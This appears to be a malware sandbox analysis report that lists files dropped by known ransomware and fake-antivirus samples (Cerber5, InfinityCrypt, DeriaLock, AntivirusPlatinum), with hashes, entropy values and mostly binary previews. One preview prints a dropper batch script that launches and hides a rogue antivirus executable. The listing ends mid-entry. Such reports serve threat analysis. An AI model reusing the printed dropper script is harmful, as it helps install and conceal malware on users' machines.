                                                                                                                                                    Preview:@echo off..title LOAD..:1..if not exist c:\windows\comctl32.ocx goto 1..regsvr32 /s c:\windows\comctl32.ocx..:2..if not exist c:\windows\mscomctl.ocx goto 2..regsvr32 /s c:\windows\mscomctl.ocx..:3..if not exist c:\windows\antivirus-platinum.exe goto 3..start c:\windows\antivirus-platinum.exe..attrib +h c:\windows\antivirus-platinum.exe..exit....
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@Cerber5.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (344), with no line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):344
                                                                                                                                                    Entropy (8bit):5.862787666034794
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6:ISW3GoPC81dEmYnSKN/F8aRn2A4UlDgfdA1rAO8UW2v9XiklQrgsGhbAAbY:ISOJPtEhSKD8aKpdA1ruUFlflQvia
                                                                                                                                                    MD5:7846944A01265A98EF03A0E23329FD72
                                                                                                                                                    SHA1:B9F60624872F32A3B5A3C0FD5663615974B8FD79
                                                                                                                                                    SHA-256:C234CF307BC377A58C5EA0ECD16CC2DD5C33A448B6835E7A34E1C922D241DA94
                                                                                                                                                    SHA-512:0E3CF694C6662E6036CE55A8B42039AC0F357BE29CFB022B361C6962D78E2E152C9C8FF18C2282301A88EB9AC16DC8B24F476A35A10868770D8C797F3C9BAF3A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:M05yeMsof2QdNe7UpoMdTZbW87+kTyyk29Fjbi5u2bQhIDZA2f6gcMxEyywbi8ut/z6gCFn4W9NT0AC3ZDFN8c7j7/XMP8oq1CJ6Qa/Q0deYtKUniG94tAKq1WVehts8BhGNY+5bNeT9MY8A+EQ45IGqYffh26o2aq1MdEQvbjFUAiXmDSmOC8577xtn61jIbE/pY3XZhQxUTqIIacmzByA5bOHJHGp6hfskBi4tgDnjAGOTlmEMXIxC7XKfdm4nt0/pCclDp2vUEIFFRUD6+47pXXYagcdLuD0Q0G6ngcngN2I4Nq+txSvsGC2XiURCBV++AVPOP0aCkiPnC6e+Vg==
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@Cerber5.exe
                                                                                                                                                    File Type:b.out overlay separate pure segmented object file 386 Large Text Large Data Huge Objects Enabled
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):130
                                                                                                                                                    Entropy (8bit):6.416260216724832
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:Tlp32C22M9euF5oJadvYd2TvtZqRI8t0Lr7RbbtzOn:mCRhildve2GvGjRbblOn
                                                                                                                                                    MD5:E5DA246D7F90D8D4BB525B7E969A48E8
                                                                                                                                                    SHA1:ED3894296AE1F98198A707B8439BEA62F12346FD
                                                                                                                                                    SHA-256:EA598050A8426E2E3CD7A22A4F1D4FE73D25AD3DBEAD01BF1CC5F2569825561C
                                                                                                                                                    SHA-512:694223CC0F2DFCA50052F95134BC569B1E6469F2CC7C3D9BEF6400816AED11762757347B49AF497FE3D7F73BA1CBD8D3F77B76F5396B21BB2E46C4B6773ADB2C
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:........RSA1p.............*.Z`v+^Y%.R... ..2l....c.......hG.....2x\..9.......p`JL.x...d...i..s.../6.H.v.c.p..<.g4.g=(...H.=.s.
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exe
                                                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):333007
                                                                                                                                                    Entropy (8bit):7.760231936610361
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:Nuw0sRI520bSuw0sRI520bwRw0sRI520bzow0sRI520bwuwisRI520bwuw0sRI5A:UoRQFxoRQFQoRQF8oRQFX6RQFXoRQF+
                                                                                                                                                    MD5:BCBFAFD489C5C714CFF4464FE6F686C7
                                                                                                                                                    SHA1:D918A3B6D634B9F97A948E2058D2C71B05BE53D5
                                                                                                                                                    SHA-256:1D6A0DF9D98D7CF5DFC53E8E341676FEC30E0BADD0AA986ED44E727781F9DCBD
                                                                                                                                                    SHA-512:88B00761DFEBB7631CF24E64CCD23A5418065B9F3D8A1B36EE7BC146030E79565757658B64EBB9A3BCD3C05539BE2028487A7AE874247E46E95329DEBC75F4B6
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:......................>.......................................................}.......v.......~...................................................................................................................................................................................................................................................................................................................................................................................................................................E...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):576
                                                                                                                                                    Entropy (8bit):7.675382112455731
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:Fap9b2gRZrRAKWu/eAm2BQY+ZFPhcmbn5Qy11dNPoMtlbyT85g+Um:Fafb2a+f0QYyPeI551dNQLTgxUm
                                                                                                                                                    MD5:87078C15188B828CC7F7AB60101AD47F
                                                                                                                                                    SHA1:4E212F632135D0315390D03BC2E4E8324CFD369B
                                                                                                                                                    SHA-256:CFC8334CFC9E5BCEE99D5A5F0D6CEB79A1A6EBFB40417070CF7D08A9BDF6474A
                                                                                                                                                    SHA-512:14A7D4578170FC621E476A549A48216EC5402526A959402F994B4CBF850CAE393EB9D7B37169BAFD42AF0F1715D5A43629B82198FDD90962AA102C5CF2E60199
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:.tX...QQ..}i.\W.7..3F...E.V+._..%xp...k.............t.HC......5..P....Aka^.km.J.e..o&.v8.....Q.i.....c.....t..b..}.......-.y......TI...c.o....kEE4.E1..@..C:....I.^|.Z.....s}..%.xa.6...+...^..u/.......a._..4.....t:..<..).......3\.....B.F.......u.A..G.V_.|....LD..v...4.B.....cU.t9l...O-}.{....S..q..,0|L.a..>0.I.s.......+_..Dh_........{.\.(5C..#...+.}D...r.33....t....|2..S.E.......M..]?%.r..5.*...#*`P.f...u.QlB.~.3Z..Stj../%....*"@..>r.w.%....i...S`.\..@.w`..(.4....[.Wx...op}/.Q]...%-j..e.....I.?..SIM....i-.\c.....kS.=..7j.....D.8S.....8..$L....
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):464
                                                                                                                                                    Entropy (8bit):7.525405936209394
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:Fap9b2gRZrRAKW8E2GEqytD+ZvpLVTUHu6atH5Mt:Fafb2a+OFgLp2ubd5Mt
                                                                                                                                                    MD5:266203E321663CC62AAD25D802FBBFDC
                                                                                                                                                    SHA1:E549FDEAB4281FCD2CBE2B682F70E664DA4A9077
                                                                                                                                                    SHA-256:FAB707CA51D2C362B280CD7C7EF4F0831A7F82DE50B50FBA8F54720ADBF1E18B
                                                                                                                                                    SHA-512:4E4B55987F63E437766F7A92198CF092F86208CB8BC5A3CB64F3DE86FAAFAC77FB3C760DDD5D77C281C8E0CE2A02924AEF928001E404EB5A4EAE683E5FF6EA37
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:.tX...QQ..}i.\W.7..3F...E.V+._..%xp...k.............t.HC......5..P....Aka^.km.J.e..o&.v8.....Q.i.....c.....t..b..}.......-.y......TI...c.o....kEE4.E1....j......R...J..g.#c...b.(|.b....n..Arkka.?0.?{P...85...3..Q...j.......Yd7..R....EQZ....e..s|..hX..8../u. .......y..D..pX.m.....7.N....;bR.QR.x.fo.b.gRB./Ox...z.hK4..=[c...~S.@.d."...J_.z.b.....v..A{Ib..!..;.?.....P_A.'.^oTG.7.c....K..no./t...n.........w,q#....R.r\..r.D..V.k3#)..v5...X[$
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):176
                                                                                                                                                    Entropy (8bit):6.903895041871299
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:xDN9X1K0jbX7+pG64eFllt0PY3dg/n59ERvNjYGcIRjIKaKUyoXRndrxPznIn:xDN+0nap53qY2RmRZrRtaKUyohdrqn
                                                                                                                                                    MD5:208D3E854B46FF70FCCB3653DA7C13A9
                                                                                                                                                    SHA1:0B4D2FA29A8F1F36B3682FC638CD96600A27E25D
                                                                                                                                                    SHA-256:93FFD40D99DFF049EE6BC26E626F5FF38B5AAAC3AC308F28CC3C344B64C69FCF
                                                                                                                                                    SHA-512:67C2C5EA7F3925E7279952DA8BB109364CB71893AA2C6616DA9E388178E8B45A80BE3F932EEA5EB76874A55EEBD56DB7C1A255B2707C07E23CCAC498BD06C29A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:.tX...QQ..}i.\W.7..3F...E.V+._..%xp...k.............t.HC......5..P....Aka^.km.J.e..o&.v8.....Q.i.....c.....t..b..}.......-.y......TI...c.o....kEE4.E1..s8....*f.....B.
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):800
                                                                                                                                                    Entropy (8bit):7.7714890931854885
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:Fafb2a+53ajMQwyCZ8/L5NC8qA2MKWc+nZbG4BLB:Fkaac2MQim/L508qAyWcMbGKLB
                                                                                                                                                    MD5:23FD2B38C825213210C02C12EF7EC8E5
                                                                                                                                                    SHA1:EC89E42991A7AA2D517B51AF4C21C65D1E0279D3
                                                                                                                                                    SHA-256:CC2EDE82C61DF8C52A3FA72BBF0236A1212388935928BFDD71B8B8B841C130C5
                                                                                                                                                    SHA-512:E51C11E4EDE3B99F792F444229D0FC904C191ECBF69129060D100A7DDCCC7D5E4991FF85D1570742F1FDBAD58E5C382ADCEB46B54469FF2D7D5E07890A7F9E73
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:.tX...QQ..}i.\W.7..3F...E.V+._..%xp...k.............t.HC......5..P....Aka^.km.J.e..o&.v8.....Q.i.....c.....t..b..}.......-.y......TI...c.o....kEE4.E1..w..v.*w...V ...*.<..C@.J..............]..M.UgYf..E~z..SK$.q.........e..3.i..F..../...x.u.9..."...q..".^+.WT.I/.a_...+.y-$....-...) ._!.F.q..._.Y.@\}d,....."..iJ....>....L.{z...te.'..f..Q.3.....E.P..C`.....it...ad...j.v+.m.....[6".m.bq..K...L..GM2.<.P..\.A......;.....O..a.G.. .Y...Jf%v&f.@8D.R8..F))e....g............dX.\u..Kf.;..k8?/....#..d.9....L(.[..D..../....c.#BZ..7=....uTV<..Ie..._..[R.......o...*...<a......7.I..8.N.wB....M5>~U.....g......6..qra.l..K'.E...2.....0{..1....?d.....s..?\.i@.e..i9..Z.H..^...I....v%<.:[#)2....iS.&._.By.hyv...a.L..^........v8...c....V.JP.........LKL....\"........atc.K_ED.6
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):153104
                                                                                                                                                    Entropy (8bit):7.9987820223186645
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:3072:AofJtofhWfJdMOU1efxp0wc+PHLMyFrcbVkwonHy7kNDcjsiJU+cPS1TnXTQ0E5:A8t6WffMLQbrZFrcb+rKAcoexuGTXTq5
                                                                                                                                                    MD5:A984F92A2602311CA807B3CCE72B9B71
                                                                                                                                                    SHA1:ECF5C1745DDC500F1B44FB394A694F40C5C519BC
                                                                                                                                                    SHA-256:87705333BEE384CBF54320687ADC3503C10A2FE8BF1CFEACC22D3CAFD4278B82
                                                                                                                                                    SHA-512:DA540E3B1B4DADAEB203C6983FE394D05E3326A48E60D5A260B69D0FD386D30A7895F0019333C0808720EE9BDC2342342DBD969146272F5F9094311CC282CD34
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:..sU.^."..u..).8.....>bv...2^%.'.$....G.].rM5..V3.o..M..#.m.Ri[.4..<...wW......n...!..T0.1.G....)gk.G..oOj,.........c .b.....G..(..#.{J.....Jkqw3)...k...5q...^.I?HXX.......F......m.}.O.$.>!.(;/{T?zz .k}S.......x.T.........z.H....)...."..}....Ui..........Z..|U..=J..kd.'r.....K.}3T.5u.=..W..k..{M....O...|K.a...}..#.[...x..4.i...-"S.fLPu'n.'.......d...w.......]..; .w......^N..<,..tE}s4t.S4?.d.V......0......c. .w.....:hc...<...P..}..@#.%..... .....Q.d...G...E{.*?.5$..............T.E.....^.........p..gY...A..9..f.r..-.D=.a.<.c........-.1....a....E..1>t=_.l.....a...........".7.......CQS-.g%.O..$K...h...:.Q....l...Z.......x..vZu..G9*.{M.ME5j.v.B.xG..P,.Oi.M.....%j.:.f.&.1............H.Q<T.CD.X....`."^K.{....t....&?.SS.)fd.E&5.y....o.W.j.Q.A......c.(..Y.-!....@I.[X.j....Z.jt..)N..P....x..._z"oGE.K....Q?....%.s....|....D.7.B(....~\..n...l.i$..cj.E.....a..f.~... .UX.Qm0........+..w.....@^(N?.....].....5..t.wf...,E..6..o..f..0..E.4...8...6h#.l
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.834817978834166
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:DIttWT4+Jsphice9l1A9Fu/61GL0A7xhEaX3cNbd8jUifdNRF:8+JKh/KdFLXxhEaXMNboVfdNRF
                                                                                                                                                    MD5:8A4891A7E38E037D9E3E27D13C8AFE47
                                                                                                                                                    SHA1:BC8BFC910A46FE92C4F5005151AF73D7B63C7C84
                                                                                                                                                    SHA-256:C8E8AE91A81A1CF9EBE20F6A9CC4B7F6FF09FCD12CA50D7C1636CC5296C9B0AA
                                                                                                                                                    SHA-512:CC49EE4E764FC6DF4AD4C7C0614492A42E09E88C199819911AB789BC8271D547C83E03F03AA92BEB3D24B759CCDC7F3FC9560C2AB25F6C9411244B0D11E52197
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:`.J..I......".O......Rp.......D.jr....>.....w.K%..M.l}(...)o..NBh......I...`..?@..Mi.1$..z....I....>..$W.^...%..z..vb/.<.Y..fiv...=<.t..1%.......%.[.o....!.q.u2.....:..g.,..l.4.K.L..9.....vQ.M.@.B.../..4...=..9]............5...h .|1....B...).r.A.+.^z-2F....b...B..6..v.K.N.^.G.N.-+....&..L.....d..D...U.O...N'..C.~..Tq..........s$.03M..f...I............#3...$&........du..I..\..G..xC...(.J.fHi./m..3..7..G6".}.....]N....;.d.....[h.(.(....dM.}.+*Y2R...\51...t....,..Q...p....c..g$.V..h..;Y.n.)!dH...mK...[.\c..........0.R.F#R./.R+.....0Q~../..M...t...,...w..X."...\....f..T.....>..8........J...A..=.7n'.5...nl.&.......$b&.~..2`F~.4n.V.`U.....@.T.W`..o..........{I...G]Y./t.._.p9.f.J.PIv.2....x......g......\......F.[....7i..k..<I....L.FT}.Q..Tr;..#Ma.U.vx......49N...7m.UwTa\]r.|...G.(...j..UI....O.......}...+J..=.."M?G.../M..I..d._...lW.L.!b.+,v,.S,?.]...$C.*..rcJ,.2`.[......:....5.z...]...]r9....".i..9.6.".4I....Z...'....X.h8".=..hI.<....._.}d....=.B/~S.D.
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.817079449828264
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:sj/7z+8nA4MF2cFakmtYjKSPT5oMIRDyhwVHEYNslM+9UzXbNtwKsHwccU4f23Mr:mqKHMF2imWjKSWXHkYY8wKsHwcJ4f28r
                                                                                                                                                    MD5:0C27959A1441C21A448256B0429084A4
                                                                                                                                                    SHA1:D73A133B1CE9B46D69E38D372A106C684E016360
                                                                                                                                                    SHA-256:D8BD04F4D47C8A7FFD95DDA10047EF2FF1BFB13246D0FEB303DD421B95C7057D
                                                                                                                                                    SHA-512:898FF9D8D1E97E3BB9DA6EED60B1CF7B02C4B7133E336EFD5BCF5D0FB8D737B953AAF46AD77C8ADA4863ED1692475E39C9E5F2A87A23401006B65C9E61318000
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:..G.f...J.......Y.L#....}4..K ...5g.H..{...}w..Y.3....j...G........T.e.\x\.+.Hc.......}E.+.....>..JN~.fN^.....M.O....../...v..a]..U.s..t.}8...<....1=G....iW. .......v.4.O.2...0.....b.m.c.W.$...I.F.|...aY.... .o..C....~...JO..|{....`9N...R..b.R;.*5.(.....<.L..+..._..yI.3l./..6..g3.z.......S....z[P0r n..9b....@..........p.P..B....c%.y-S$..RF..'AaE........?!/..7/....S0..-@1.u..P.....A..{...~....ek..0.V.H".Q.M....3.g/V...T.D....e...E..|.g.8..![..3..c.8..v....a.$.~.7,G..z<9.U,;X....x~IWK..t..z^..;...5..T.)...H...7..=N.v......}sy5^U..=.$.T."5t.y...V.+.M..nE.j...d.!;9.IC.K..... Q9|.....WbzA.8q1..T...@.lO%..c.Gy+"..x.<o................\(...}[....}Z."...4v...&....s..9..^....=I.{?T.;...Ddt Y~t.../9....C..., 3]..8K!m....-...~.m...6.jH..t.Yp........-..T...b.$...(.I\........1.....|.7+..}....f.M.-W....E:...S......t.Y....f8.Z-&...,..@...Z..[Z...........LeWD.....F.MK...p.....Rd.....V.]o.8..2.....o#.>zJ! .d.$S...I>A......_t.\.#X..J...... .7.........aW....!.
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.827452321822853
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:aqxY9ZgW4qv174ofmP3xXJT83e1UGFH3NvcRQ7wYfz24mbh5a:aoGJvRNfWB52eTFHeRZYqVbhY
                                                                                                                                                    MD5:17AE5C5813FCFDA6C035F4FAA747C22F
                                                                                                                                                    SHA1:3BC3524E5D6753A688C2C14E06E338C6E1D03D55
                                                                                                                                                    SHA-256:27B605521395F2806B7E4709D0033283F308C94B014D1222F1E93919CE8776AC
                                                                                                                                                    SHA-512:9033CB82309991F3BB2212A177C8F913A9F0129CE14D1E537A25C3A8E47336877E5AB4B76F345785103672C998D84DDCFDF834FD7022A41C444151B7DEFEC5FA
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:..s."....h/W....>_[..!N..R..I.4.%/>..IL!^.............<1....N.e./w#U=^.k..W....S......v\..SV.&..v.A.........D.]h..V)..).E!.K..&.W./+eLCB. <..].Z..7.S_.m....bzo..e...otD.B|......$.G@.x..F.iV......`e........C....)C.(..H...U.]....g..4.`.).......Qp........._v.I-4o.....H'..y|9..Q.bV.=..3.R..z~.!.z.u........+.9...1.*....F...y...+....{!F.\^.v ...nB..{.A>..P.:s.....!.l.\...2..2..Sb...y.&.bL...J...".HI+{.\.%.(. k.CH..[ez...TJb.^.*.......},.\.1..S..&.C86..c_U.zOJ.b..B_^.+.h.dQ.hf.o..^Ja.d..........$.\!.M3..Zg....;......D..(......r:.........JL.g.a0..0W..p.D;.1q..e?o.n..Y..7_/.#.$#.....`!<..C...x...8x.......Ffh..`.S...9q%=.D......q.*.K...M.Ni....Z..z:.O.Q.g...i5...w...P..r..,..r.x..I..i......U%.'M.P.p}..j..7.6.T?!.R....f...>..K....j..DgkZ.$.4..)...p..\g.~4..u...:Ac@...".d..D;".....8...A.r.#.o..;...U......q+$..v.#.0..C.\'.%.r.PN...6v...n...A&(Q..<..b.Z_.|.....g..J..%......t.-....|.....S.=....dhFg.[...T)...)>{1.$..-mN.}...r>uD..#.......X=.._.
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1040
                                                                                                                                                    Entropy (8bit):7.805609632392239
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:QvKB66CC8PPTLAa1xWTjqO3rWx9lNa+p8aEgKACjEB925Xc6g/2+:QvKBjCC8HTbTWjqO3C7lNxpAgUOGcPZ
                                                                                                                                                    MD5:65008CFD60196F0C4767671A48A90762
                                                                                                                                                    SHA1:C44D2DBAB5E323C83259D4720D2D9C484E198B1D
                                                                                                                                                    SHA-256:79112E901638A388A6B94EC36B84CA18FE1C727F2C3A5A3E6D35F6334BC18A48
                                                                                                                                                    SHA-512:8D6D0CF116974FB7371EBC615E214E472AADB5BBC23BF81E9813DA80903CB62D38EDCD03A2770F65F4F169AD8D5A49885412ABD208251397236948C4B011015D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:3.t.^.Z.dg.<..>....../t....0[8l2C...!.X............./R3.7..G..k.]..A7.!E.=.X[g......D....&Q...6...#...UR3.w6.Q...C.$!..Qm.z../.o.F.......I"e...U.jI>d6X..aQ60[......*.\i6..^.y.u.IIp..tJR$..OO)=..jFZ...U?....E...NP..X.[.">...0.aiA /I..P..+...SKu.F.I..\.p.1....o......r....*.....~U..!.........w.Ls7k.j{...mp.Lq.x........%.HF..r9...X.,%;.....>..I..R6}..)...,0.\e..6.}$.....]W-F..)@......../....Bu"~....e...?.~^......u\....>M4..x..V.....c?*.w..e.`=....X.|C0..A....P..`..<1...U.(.uXIp....q.0.7...e.s.>.{.j..'..s..y....j......{.A......}..X.wkb..U6.....z..-Q......O..B.`?.M..y,...(d..3.qRbk.W.B;<0..s,#-]...0.u...p...e.}...X.V..6q.?B....@.]..j...k....@'...._.4......[Y.....`cd..W..^..aqQ...I..e..T.;.a.4.....^.]:yE....=........+mIR..../.v.[.wQ...rjsV......:....Ny.k{8x3/}T.bF.e.0....u..]...W.+.O.../).6ry.$@.......VfV!^.......n..I...~.XM.:......h. X........?.?.%zF.Y.t.x.V`...`K...?1AN#.5.n....U.%,e.H........ >......X.D*T..pY....J..9./T.b'.x.6. <..W......K.=......_..h...
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1178406
                                                                                                                                                    Entropy (8bit):7.999833834152535
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:24576:lKTP6/tHWoQQRakFbfVKqycdGiazlXVyQ8MiSIxjlTGPje9V4iuquGGspoLA:lK4WDQRaklfVKJcd7MXVlPiZlTejkV42
                                                                                                                                                    MD5:9A38C29FF9E12BA2892381EB51C79934
                                                                                                                                                    SHA1:76FCF6BCAAC32F624FA0154A9177E44469B5886A
                                                                                                                                                    SHA-256:45B75A116AA3B07F90A7C2D9A83C2CDE524797DF88BB5E20F9DC1E74D8527861
                                                                                                                                                    SHA-512:C26D8C252D6F18A2AE4419BBFE27099862A625CBC40D8F104FA20CB361DA112EBE6A17935AC3613C24B58F9C291D2219E55F59E0FA40B81F92FCCF190115E734
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:PK..3...c..\.<....X...Z.......Endermanch@AnViPC2009.exe......AE.........-4x5...B.....]..<..}./a..(.q\.{|0....<.{..._..:.....C:.....<R..\]..x.e.S*.AM.2.....!....T..y..u..2._p.N.....Sr..../1..o.2....&..U.D...z%..I..Rn..r.0.........m.,`.Q.......<..6..EB..v7f.,X..x..)1.-"............{...<..>....%|.C...dID...hR.OD.....w.<@..C...6....U;W$..e.....q..!.,.Y;.>.'K...C..Y.J.Q..h.~..f...3...D..C....1.PG..E..%...#-T.<.B..:X...>.SF..2x.S......z..5....1]....c...h.....]....:.WWL...RWV.;.=..?.....S..Of...'......oa..%........8AQ.y...p...X/x.2g._.V.6.fL.~......:..x...........tB.V~..0.v.....uO3..............$.Z...n.b-..P*:$......U.....U.B...O..}..L....3.n..@.......nz.q'.l...z_....e..l.6....{.....>...|%6..;..}o..p[..X.....}..Z.(..7J......l...kb...rHib......1.*...*..m..,.1.p,..FM]AaE....P.+..*M...`XhK.s87P.2Hc.....*.......PY.m.x:OO......&~#..@...}J..B.uq.\.v.fE.p....(.G\!.. X..0....I...Y..mw.Bg.\.R..K..vV.C..lT.wT...o2...Y"(M..,.}.k...@b.8.(.%..K...YT.34[o|.[.
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe
                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Icon number=0, Archive, ctime=Thu Sep 29 20:59:36 2022, mtime=Thu Sep 29 20:59:36 2022, atime=Sat Jan 16 20:57:50 2010, length=22528, window=hide
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1700
                                                                                                                                                    Entropy (8bit):3.0585764316309505
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:8KdmDl/NYyAXOp+cWeKec4of2b0agoas7aB6m:8KwlORXO+9kofE0FoIB6
                                                                                                                                                    MD5:645550DF24524C6B5F1E6BCA2B7D2598
                                                                                                                                                    SHA1:EEB499DABF7A74126D2C3C9DF56DB9F6B992EA26
                                                                                                                                                    SHA-256:1E2F79A5D449CD8B5A05E3571992CA2FE0C57A8D3BBB59CB62D23EBD57215D12
                                                                                                                                                    SHA-512:90488A9C54F209F459F874D7335E97524C7CFEEE0620F90AC415D293114DAAAA49387F13CE7A9E54F5FBAE2CEDEF6876D3E29FEFA3FFF407A9A844572E2EA7F7
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:L..................F.@.. .......N....Z..N............X...........................P.O. .:i.....+00.../C:\...................V.1.....=Us...Windows.@......L..=Us...............................W.i.n.d.o.w.s.....h.2..X..0<9. .302746~1.EXE..L......=Us.=Us.....G.........................3.0.2.7.4.6.5.3.7...e.x.e.......G...............-.......F.............'k.....C:\Windows\302746537.exe....A.n.t.i.V.i.r.u.s. .P.l.a.t.i.n.u.m.......\.....\.....\.W.i.n.d.o.w.s.\.3.0.2.7.4.6.5.3.7...e.x.e...C.:.\.W.I.N.D.O.W.S...C.:.\.W.I.N.D.O.W.S.\.3.0.2.7.4.6.5.3.7...e.x.e.........%SystemRoot%\302746537.exe..........................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.3.0.2.7.4.6.5.3.7...e.x.e...........................................................................................................................
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1712
                                                                                                                                                    Entropy (8bit):7.897831286296865
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:w53hipDejCrp+4fG9rx1SX162kVAmKFEph1CMxN:w53hiA0pDGfsX16fNQW
                                                                                                                                                    MD5:4BE09B18FDA7B37F782BFBC36999FE4E
                                                                                                                                                    SHA1:6887F462B2A1D8D535BA387A7763375A4D1D428D
                                                                                                                                                    SHA-256:10647241F57A0CA5927DB12D8919DF3077D522824E667BAE32D178E850017386
                                                                                                                                                    SHA-512:89F7A824D61ECD07DF3EE1A2A3EAF7B88A1C85252D85CAD7056F5478B59006A59716922C862E0C35D5BCEC4492D0B8D82B7C2F4655BA8613DE044C1F5C53B9B5
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:.t..D..w)..@f....#.!.5+5S.V..._..B...y.+......B.*.P..q.1.(.$...-..u<...(.M.*...W...O..4?.vx...H...e...f.2........"..? ...f.H.m}.O.3..:..5.....l+...x.}.....K....7...{.G.T2A.&do.....K%X~..i..3..9 .p./.EKlp.._.j.Ob...4wb..<W.6a......_.5D..5H+.1n.j.H...o.H..Uc.O.A..J...|yS.=.}..siZ....`"2Z{..A}7..u......G...N..KH^.7...O.yN....K.(e.c..H..M....2{h?.t.<..".C*#..[r.....!.,i.7.....2.5.D....a.....O2T.....].J..6'.Le..j9#f...7i5m.a...j..x.h%...j..*.hm.x.Nz."AzI....X.....e.TC..7..7F.t)..?kC.~..g."o.n.....B.h.....T....1k.(.roz{`M.J\c.f.@\...Z..FX.+..*}4EN{=._.-....1...../...Wy7]s.....O.z......3v..@D..{*....^.....DZ'.sI..r..A&.#.=...dH..,Y..uS\Wm..{.*......"S.zN.q.F.;QR.....z..3..rb.!...'h@./..*..........Y2........%...DY.....E..A.i./..j..Qv.v....T...29..]....jD.O..s...zH1....'~J......^..v.3S.WM...l.".T.H4a...j...g.V..uH..>v..x.{.U*.r7......g.@.1......=.pl.........'..I.....~.=?.@M4..........T/^......]_..o.v....Y_..;1..9..Z.:.$...(D.....
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
